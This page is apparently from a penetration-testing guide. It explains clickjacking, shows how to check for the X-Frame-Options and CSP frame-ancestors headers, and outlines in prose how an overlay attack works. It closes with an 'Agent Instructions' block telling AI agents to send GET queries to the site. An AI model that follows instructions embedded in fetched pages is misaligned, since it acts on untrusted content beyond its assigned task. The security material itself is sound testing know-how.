# Clickjacking ## Introduction Clickjacking, also known as "UI redress attack", is a type of web vulnerability that allows an attacker to trick a user into clicking on a button or link on a webpage that performs an unintended action. This is achieved by overlaying the victim's screen with a transparent layer, or `iframe`, that contains the malicious content. The victim is usually unaware that they are interacting with the malicious content, as it appears to be a legitimate button or link on the page. ## Testing the attack In order to check if a website is vulnerable to this kind of attack, you need to find if one of these mechanisms is implemented. ### X-Frame-Options `X-Frame-Options` is a header that can be used to indicate whether a webpage can be loaded inside an iframe. By setting the `X-Frame-Options` header to "deny", a website can prevent itself from being loaded inside an iframe on another site. This can help to protect against clickjacking attacks, as the attacker will not be able to use an iframe to overlay the victim's screen with malicious content. In addition, framing can be restricted to pages from the same website by using the `sameorigin` directive or to a specific website using the `allow-from` directive. ```http X-Frame-Options: allow-from https://example.com ``` ### Content Security Policy (CSP) `Content-Security-Policy` is a header that can be used to specify a list of trusted sources for various types of content, such as scripts, stylesheets, and images. By specifying a strict `Content-Security-Policy`, a website can prevent itself from loading untrusted content, including content that could be used in a clickjacking attack. where policy is a string of policy directives separated by semicolons. The CSP provides the client browser with information about permitted sources of web resources that the browser can apply to the detection and interception of malicious behaviours. The recommended clickjacking protection incorporates the `frame-ancestors` directive in the application's Content Security Policy. The `frame-ancestors 'none'` directive is similar in behaviour to the X-Frame-Options `deny` directive. The `frame-ancestors 'self'` directive is broadly equivalent to the `X-Frame-Options: sameorigin` directive. The following CSP whitelists frames to the same domain only: ``` Content-Security-Policy: frame-ancestors 'self'; ``` Alternatively, framing can be restricted to named sites: ``` Content-Security-Policy: frame-ancestors normal-website.com; ``` ### Proof of Concept If none of the previous server side mechanisms is applied, then the webpage can be vulnerable to clickjacking, Here's an example of how a clickjacking attack might work: 1. The attacker creates a webpage that contains a transparent iframe overlaid on top of a legitimate webpage. This can be achieved by using the Burp suite tool [Clickbandit](https://portswigger.net/burp/documentation/desktop/tools/clickbandit). 2. The victim navigates to the attacker's webpage, which appears to be a legitimate site. 3. The victim clicks on a button or link on the page, believing they are performing a legitimate action. 4. However, the transparent iframe captures the victim's click, and uses it to perform an unintended action, such as liking a post on a social media site or making a purchase. ## References * [Clickjacking (UI redressing)](https://portswigger.net/web-security/clickjacking) * [Testing for Clickjacking](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking) * [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-pentesting-guide.marmeus.com/web/clickjacking.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.